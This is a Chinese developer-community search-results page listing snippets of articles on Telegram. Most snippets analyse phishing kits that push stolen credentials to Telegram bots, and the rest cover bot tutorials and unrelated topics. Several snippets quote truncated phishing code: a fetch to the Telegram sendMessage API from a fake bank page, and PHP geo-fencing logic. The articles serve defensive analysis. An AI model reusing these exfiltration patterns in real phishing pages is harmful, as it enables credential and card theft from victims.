有没有可能通过php和telegram api控制一个真实的电报账户？ - 腾讯云开发者社区

文章/答案/技术大牛

发布

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

摘要近年来，即时通讯平台因其开放的Bot API和高用户渗透率，逐渐被网络犯罪组织武器化。...据SC World简报披露，此类活动主要针对企业邮箱（如Microsoft 365）、在线银行及社交媒体账户，通过短信或邮件引流至伪造登录页，用户输入凭证后，数据经API实时推送至攻击者控制的Telegram...2 攻击架构与数据流分析该钓鱼体系由三部分构成：前端钓鱼页面、后端数据收集接口、Telegram控制机器人。三者通过轻量级API松耦合，支持快速替换与横向扩展。...关键特征包括：使用官方CDN资源（如logo、字体）增强可信度；表单提交地址指向攻击者控制的中间脚本（如/api/collect.php）；部分页面嵌入JavaScript，用于收集浏览器指纹或阻止右键查看源码...>该脚本在200ms内完成数据推送，并重定向至真实登录页，使受害者难以察觉异常。2.3 Telegram控制机器人攻击者通过自定义Telegram Bot实现交互控制。

2671 0

号称最安全的Telegram也中招！某网惊现数百万用户电话信息

数据安全始终是环绕在大家心里的疑问，手机越买越贵，明明很注意隐私信息了，怎么还会出现数据泄露呢？近日，暗网出现了一个900M的数据库，其中包含数百万个Telegram用户的电话号码、昵称和用户ID。...这样的数据库通常会将电话号码与用户ID会匹配起来。它们是通过在注册期间利用联系人数据创建的。不幸的是，允许用户通过手机联系的服务不能完全避免这种方法。”Telegram告诉记者。...由于telegram在言论有限制的地方很受欢迎，持不同政见者、新闻记者和其他有心之人，最终使用它作为匿名和某种安全的通信手段。...一个坏的参与者只需要从电话簿中输入一串作为“联系人”的号码给messenger，然后等待它找到与某人的账户匹配的号码。...这意味着您必须能够看到你的联系人也使用这个应用程序,“电报发言人告诉ZDNet,”电话号码设置控制电话号码的用户可见性没有你的电话号码(而不是WhatsApp显示你的电话号码在任何其他人集团)。”

3.1K2 0

您找到你想要的搜索结果了吗？

是的

没有找到

面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

一、引言近年来，网络钓鱼（Phishing）攻击呈现出高度本地化、专业化和自动化的趋势。...一旦攻击者成功窃取账户凭证，不仅可访问企业邮箱、网站后台、域名管理面板，还可能进一步渗透至税务、社保、银行等关联系统，造成连锁性安全事件。...三、钓鱼工具包技术分析3.1 样本获取与环境搭建研究人员通过监控暗网论坛及Telegram频道，获取了该工具包的压缩包（SHA-256: a1b2c3...）。...首先，攻击者可定期更换域名与Telegram Token，规避静态特征检测。其次，IP地理过滤可能误伤海外意大利侨民或跨国企业员工。...企业亦应实施最小权限原则，限制Aruba账户的API访问范围。六、结语本文通过对一款针对意大利Aruba用户的钓鱼工具包进行逆向分析，揭示了其前端仿冒、地理过滤、Telegram外传等关键技术特征。

2231 0

APT分析报告：06.猖獗的小猫——针对伊朗的APT攻击活动详解

我们发现一些反对伊朗ZQ的账户发布推文，提到了一个非常类似的SharePoint网站，该文档中的网站很可能冒充了以下网站： AFALR的官方网站如下图所示：二.感染链当受害者打开文档并下载了远程模板后...它将定期将Telegram主可执行文件复制到中 Telegram Desktop\tupdates，一旦电报应用程序启动，就会触发一个更新程序。...另一个Telegram频道提供了钓鱼企图的截图，显示攻击者建立了一个冒充官方Telegram的账户。最初，攻击者在新的Telegram更新中发送了有关这些功能的消息，使其显得合法。...此外，后门的功能以及窃取敏感文件、访问KeePass和Telegram账户的重点表明，攻击者对收集受害者的情报、了解他们的更多活动很感兴趣。...其中一个未使用的网络钓鱼资产甚至包含一个预先输入的用户名，可能是攻击者先前操作的目标。未使用的网络钓鱼HTML资产和位置跟踪代码如下图所示。

2.5K2 0

【技术分享】使用电报API免费创建个人通知系统

电报简介电报是一个消息传递应用程序，类似于WhatsApp和许多其他应用程序。这是一款维护良好的应用程序，由许多功能提供支持，使其比竞争对手更具优势。...今天，我们正在探索 Telegram 的 API。Telegram 具有一个非常简单的 API，几乎可以自动化任何事情——您甚至可以使用它来向您发送消息。为什么需要个人通知系统？...您可以转到 web.telegram.org 并按照说明进行操作。（注意：这不是必需的，因为您需要在应用程序中编写很少的内容。创建电报机器人现在您有一个电报帐户，我们想向其发送消息。...创建机器人是通过向名为 BotFather 的现有机器人发出命令来实现的。首先，转到电报（在移动设备或网络上），与@BotFather开始聊天，然后写一条新消息然后发送。...电子邮件对我来说有一个非常具体的作用，因为它们是我个人沟通的主要方式。和业务问题，所以我不想弄乱我的收件箱或有一个单独的电子邮件地址。

6.6K6 0

钓鱼攻击之后，你的密码去了哪里？——一场横跨暗网、Telegram与企业内网的数据黑市追踪

一、从PHP脚本到Telegram机器人：钓鱼数据的“第一公里”传输革命传统认知中，钓鱼网站通过嵌入一段简单的PHP脚本，将表单数据以邮件形式发送给攻击者。例如：的一个仿冒招商银行的钓鱼页面中，发现了如下代码片段：// 钓鱼表单提交后执行fetch('https://api.telegram.org/bot/sendMessage...；等待时机：直到一笔真实付款即将发生时，伪造一封“收款账户变更通知”。...即使原密码被重置，攻击者仍可通过合法API接口操作数据。...“撞库的成功率其实不高，可能只有0.1%–1%，”芦笛说，“但当你有100万条数据时，1%就是1万个有效账户——足够支撑一个黑产团伙运转半年。”

1721 0

精准围猎：新型钓鱼工具包专攻意大利，本地化伪装成网络犯罪新范式

；动态反检测：当非意大利 IP 尝试访问时，服务器端脚本会立即终止渲染，返回 403 错误或空白页面，使传统沙箱和威胁情报平台难以捕获样本；凭证实时回传：用户输入账号密码后，数据通过 Telegram...地理围栏（Geo-Fencing）机制工具包通常在 .htaccess 或 PHP 脚本中嵌入 IP 地理位置判断逻辑。以下是一个简化版的 PHP 示例：php// 获取访客IP$ip = $_SERVER['REMOTE_ADDR'];// 调用免费IP地理API（实际攻击中可能使用本地数据库）$geo = json_decode(file_get_contents...给中国相关单位的启示：政务系统禁用外部链接跳转：所有身份认证流程应在官方 App 或浏览器内完成，避免通过邮件/短信引导至 Web 页面；实施“零信任”访问控制：即使用户通过数字身份登录，也应基于设备、...正如芦笛所言：“未来的反钓鱼，不是比谁的算法更聪明，而是比谁更懂用户的生活。”在全球数字化浪潮下，没有哪个国家能独善其身。意大利的今天，可能是任何一个高度依赖数字政务国家的明天。

1131 0

钓鱼团伙用Telegram机器人“接单”：欧洲凭证窃取进入“实时客服”时代

他点开链接，进入一个与ING官网几乎无异的页面，输入了用户名和密码。几秒后，页面提示“验证成功”，并跳转回真实银行首页。...事后调查揭示了一个令人不安的事实：在他提交凭证的瞬间，一组位于东欧的犯罪分子正通过一个Telegram机器人实时监控他的操作。...攻击者利用Telegram开放的Bot API，将钓鱼活动模块化、自动化、甚至“服务化”——从模板分发、数据回传到会话接管，全部通过聊天界面完成，宛如一个地下“钓鱼SaaS平台”。...阶段2：数据捕获钓鱼页面表单提交后，数据不直接存入数据库，而是通过后端脚本（如PHP或Node.js）调用Telegram Bot API，将信息推送至私有频道：// phishing-handler.php...、Zscaler）阻止对 core.telegram.org 和 api.telegram.org 的非业务访问。

1891 0

钓鱼攻击中窃取数据的流转路径与防御机制研究

2 钓鱼数据的采集与外传机制2.1 传统邮件回传的衰落早期钓鱼脚本通常在HTML表单提交后，通过PHP mail()函数将用户输入发送至攻击者控制的邮箱。例如：Telegram Bot 成为主流回传通道当前绝大多数钓鱼页面嵌入Telegram Bot API实现即时数据推送。...chat_id=${chatId}&text=${message}`;await fetch(url);}该方案优势显著：Telegram服务器分布全球，抗封锁能力强；Bot通信无需暴露真实IP；消息可自动转发至多个频道或私人群组...对于电商账户，可能直接下单高价值商品；对于云存储，则下载敏感文件用于勒索。...有效的应对策略必须覆盖全生命周期：在事前通过MFA和密码管理阻断初始利用；在事中通过行为分析识别异常会话；在事后通过自动化响应快速遏制扩散。

1881 0

“发票未付，服务将停”：意大利主机商客户成钓鱼新目标，域名与网站控制权正被悄然转移

在数字世界里，一个域名可能只值几十元，但对一家中小企业而言，它可能是品牌、客户流量、甚至全部营收的唯一入口。...其客户多为中小企业、开发者和机构，日常依赖其管理网站、邮箱、数据库及域名解析。这类服务具有鲜明的周期性特征——每月或每年需续费，一旦逾期，服务可能被暂停甚至删除。攻击者深谙此道。...后端：Telegram 作为“神经中枢”所有窃取的数据（用户名、密码、信用卡号、CVV、OTP）均通过 Telegram Bot API 实时推送至攻击者控制的私密频道。...“一个托管账户，等于一把打开企业数字资产保险柜的万能钥匙。”芦笛强调，“它控制着网站、邮箱、数据库、SSL证书、甚至CDN配置——一旦失守，等于全线崩溃。”...账单操作必须“闭环于平台内”所有服务商（包括 Aruba、阿里云、腾讯云等）均明确表示：账单支付、账户验证等敏感操作，仅可通过官方控制台完成，绝不会通过邮件链接引导。

1051 0

Telegram-iOS 第 2 部分的源代码演练：SSignalKit

Telegram-iOS 在大多数模块中使用反应性编程。在项目内实现反应功能有三个框架: MTSignal: 这可能是他们第一次尝试在目标-C中建立反应性范式。...它主要用于模块 MtProtoKit, 它实现了 MTProto, 电报的移动协议。 SSignalKit:它是 MTSignal 的后裔，用于更通用的场景，具有更丰富的原始和操作。...image.png 实施应满足要求：控制器从当前用户名和当前主题开始。电报有一个强大的 theme system，所有的控制器应该是可主题的。输入字符串应首先在本地验证，以检查其长度和字符。...当输入字符串有效且可用时，应启用正确的导航按钮。一旦用户想要更新用户名，正确的导航按钮应在更新过程中显示活动指示器。有三个数据源可能会随着时间的推移而变化：主题、经常账户和编辑状态。...对于电报工程师如何保持代码质量和轻松调试信号，这对我来说仍然是一个神话。

2.9K2 0

Telegram困境反思：绝对隐私，相对自由

由于无法更新，Telegram 在 5 月 25 日 GDPR 正式全面施行时无法合规；同时，用户也无法更新下载重要的安全补丁和错误修复，可能会处于风险之中。...并通过亲政府的企业（MAIL.RU）等收购 VK 的大量股权，并逐步控制了这款软件。...他们在世界各地打游击，每到一个地方就在 Airbnb 上租一处环境宜人的场所作为办公室和起居室。而这一切，都是为了避开监管，追求最大化的自由。为何如此受欢迎？...Telegram 支持设定聊天记录定时销毁；支持一键删除账户，删除了账户后，所有相关的资料也都一并销毁。用户只需要简单设置一下，就不再有后顾之忧。...Telegram 在各个平台上几乎是从最底层的简单 API 实现，几乎不使用常见的库，而是自己实现所有的界面控件，且控件样式简单，效率很高。

3.5K0 0

面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

攻击者通过伪造“域名发票未支付”“账户验证失败”等高时效性主题邮件，诱导用户访问高度仿真的登录与支付页面，进而窃取凭证、信用卡信息及一次性验证码。...：完全克隆Aruba登录页与支付页，包括CSS、JavaScript及动态表单；CAPTCHA绕过模块：集成reCAPTCHA v2 bypass代理，向真实Google API发起请求并回传token...email=user@domain.com）自动填入登录框，增强真实性；Telegram Bot数据外传：用户提交凭证后，数据通过HTTPS POST至中间脚本，再由Python脚本推送至攻击者控制的Telegram...3.3 数据外泄路径典型数据流如下：Victim → Fake Login Page → PHP Collector Script → Telegram Bot (via API) → Attacker...攻击者创建多个Bot，每个对应一个钓鱼活动，通过/getUpdates轮询或Webhook接收消息。

2131 0

Telegram小程序钓鱼攻击机制与防御策略研究

本文旨在填补这一空白，通过逆向分析真实攻击样本，揭示Telegram Mini Apps钓鱼攻击的技术细节与传播机制，并在此基础上构建可落地的防御体系。...和社交证明（如“已有12,847人领取”），利用损失厌恶心理促使用户快速点击。(3.2) 界面伪造点击链接后，用户被导向一个高度仿真的Mini App。...(3.3) 凭证窃取钓鱼页面通常呈现两种交互模式：模式一：账户接管页面要求用户“登录以领取奖励”，并提供手机号输入框及验证码字段。用户提交后，数据被发送至攻击者控制的服务器。...(3.4) 资产转移一旦获得账户控制权或钱包授权，攻击者迅速执行以下操作：清空TON钱包余额；转移关联的NFT（如Telegram Gifts）；修改账户绑定信息（如两步验证邮箱），防止用户恢复。...示例：Kaspersky for Android可通过Notification Listener API监控Telegram通知中的链接，并在用户点击前弹出风险提示。

3151 0

我开发了个自动发布资源的电报机器人！

又有几天不见，上段时间建了一个电报群，有一部分小伙伴已经加进去了。这个电报群主要做的是分享一些技术资源+程序员。如果你不知道电报是啥，你可以加我微信私聊。好了，回到正题。...这篇文章的重点是来讲讲如何把资源发送到电报群。其实电报这个app很火就是因为它的扩展性很强！给我们提供了非常非常多的api接口。...然后我们打开浏览器，访问：https://api.telegram.org/bot/getUpdates 其中这个填写的就是上面所给的HTTP...我们只需要向该api中发送相应字段就可以发送消息至群组中了。但是这里也有很多注意的点。大家可以看到请求参数中有"parse_mode": "HTML"，这也就是说电报是支持多种形式的信息的。...也支持MD格式的。这个大家自由发挥。除此之外，大家可能注意到了我使用了代理，对，因为你懂得，需要访问国外网站才行。自己挂上你的本地代理就行，如果这个你不知道怎么操作，可以加我微信咨询我。

7K5 1

“暗网议会”真的来了

Killnet的帖子读起来有点像政府简报，内容如下： 72小时前，来自俄罗斯和苏丹的三个黑客组织负责人在暗网议会举行了一次例会，并达成了一个共同的决定：我们开始对欧洲银行转账系统SEPA, IBAN,...FalconFeedsio说：会议涉及三个团体负责人，包括来自Revil和Anonymous Sudan的代表。虽然在社交媒体上有人可能会觉得这个词挺有趣，但这三个黑客构成的威胁却是实实在在的。...Anonymous Sudan星期五在其电报频道上重新发布了这条消息。俄罗斯黑客宣布将在未来48小时内对西方金融系统发动大规模攻击。第一个任务就是让SWIFT瘫痪。...在最新的一次警告贴中提到，他们将要攻击目标还包括欧洲支付系统SEPA、IBAN，以及标准的国际银行账户编号系统、电汇业务、以及外汇科技公司Wise。...黑客组织UserSec也重新发布了暗网议会的警告，这表明它很可能也会加入此次网络攻击。UserSec过去曾与Killnet和Anonymous Sudan合作过，此前的攻击目标是北约。

5254 0

Rekono-自动结合多个黑客工具执行完整的渗透测试过程

执行期间获得的结果将通过电子邮件或电报通知发送给用户，如果需要高级漏洞管理，也可以导入到Defect-Dojo中。...此外，Rekono 包含一个 Telegram 机器人，可用于在任何地方使用任何设备轻松执行执行。...集成导入 Rekono 检测到的结果执行tools和processes从Telegram Bot Wordlists管理为什么选择Rekono？...你有没有想过开始渗透测试时要遵循的步骤？可能您开始执行一些 OSINT 任务来收集有关目标的公共信息。然后，也许您运行主机发现和端口枚举工具。...我知道，我知道，这是一个乌托邦式的场景，在大多数情况下，漏洞是由于渗透测试人员的技能而不是通过扫描工具发现的。但是在使用您的技能之前，您会花多少时间尝试使用黑客工具获取尽可能多的信息？大概，太多了。

1.4K2 0

【无人机】开源 | 一个多旋翼无人机(UAV)控制和估计系统，支持通过真实模拟和现实世界实验的可复制研究

(UAV)控制和估计系统，以支持通过真实的模拟和现实世界的实验的可复制研究。...本文提出了两种反馈控制设计方案：一种是针对精确的进攻性机动的反馈控制，另一种是针对具有噪声状态估计的稳定平稳飞行的反馈控制。...本文提出的控制和估计过程是在不使用欧拉/泰特-布莱恩角表示的3D方向的情况下构造的。相反，我们依靠旋转矩阵和一个新的基于航向的约定来表示一个标准多旋翼直升机的3D自由旋转自由度。...我们提供一个积极维护和良好记录的开源实现，包括逼真的模拟无人机、传感器和定位系统。该系统是多年来多机器人系统、空中群、空中操作、运动规划和遥感应用研究的产物。...我们的所有结果都得到了真实环境系统部署的支持，这些系统随后形成了这里给出的形式。

8291 0

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

频道，显著缩短从数据泄露到账户接管的时间窗口。...（常模仿MetaMask、Coinbase或企业SSO界面）；在用户输入凭据过程中，前端JavaScript脚本实时捕获表单数据并通过Telegram Bot API发送至攻击者控制的私有频道；部分高级变种甚至直接在...本文填补此空白，通过逆向真实攻击样本，还原技术细节，并构建一个覆盖“检测—阻断—响应—预防”四阶段的防御体系，特别强调对终端进程行为、浏览器运行时环境及API调用模式的细粒度监控。...：攻击者通过私有频道接收凭据后，立即尝试登录目标账户。...6 结语本文系统分析了Telegram基础设施在现代钓鱼攻击中的滥用模式，阐明其如何通过Bot API、频道分发与WebView嵌入实现端到端攻击闭环。

3461 0

一封“域名续费”邮件，竟让WordPress站长银行卡被掏空——新型钓鱼攻击借Telegram实时收割支付信息

更令人震惊的是，攻击者不仅获取了她的卡号、有效期和CVV，还通过伪造的“3D Secure验证”页面，诱骗她连续输入了三次银行发送的短信验证码（OTP）。...攻击者在后端使用Python或Node.js脚本，将收集到的数据通过Telegram Bot API实时推送至私有频道：# 攻击者服务器后端（Python + python-telegram-bot）import...提供稳定API）；数据传输端到端加密（Telegram MTProto协议）；攻击者可通过手机App实时监控“战果”，甚至设置关键词提醒。...芦笛强调，“攻击者追求的是投入产出比。一个中小企业的信用卡额度可能不高，但防御成本更低，成功率更高。”更严峻的是，国内部分建站服务商在用户教育上存在缺失。...例如，未在控制台显著位置提示“官方不会通过邮件索要支付信息”，也未提供自动续费+独立通知的组合方案。六、防御体系构建：从个人习惯到组织流程面对此类高度仿真的钓鱼攻击，需建立多层次防御机制：1.

2001 0

点击加载更多

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

号称最安全的Telegram也中招！某网惊现数百万用户电话信息

面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

APT分析报告：06.猖獗的小猫——针对伊朗的APT攻击活动详解

【技术分享】使用电报API免费创建个人通知系统

钓鱼攻击之后，你的密码去了哪里？——一场横跨暗网、Telegram与企业内网的数据黑市追踪

精准围猎：新型钓鱼工具包专攻意大利，本地化伪装成网络犯罪新范式

钓鱼团伙用Telegram机器人“接单”：欧洲凭证窃取进入“实时客服”时代

钓鱼攻击中窃取数据的流转路径与防御机制研究

“发票未付，服务将停”：意大利主机商客户成钓鱼新目标，域名与网站控制权正被悄然转移

Telegram-iOS 第 2 部分的源代码演练：SSignalKit

Telegram困境反思：绝对隐私，相对自由

面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

Telegram小程序钓鱼攻击机制与防御策略研究

我开发了个自动发布资源的电报机器人！

“暗网议会”真的来了

Rekono-自动结合多个黑客工具执行完整的渗透测试过程

【无人机】开源 | 一个多旋翼无人机(UAV)控制和估计系统，支持通过真实模拟和现实世界实验的可复制研究

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

一封“域名续费”邮件，竟让WordPress站长银行卡被掏空——新型钓鱼攻击借Telegram实时收割支付信息

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐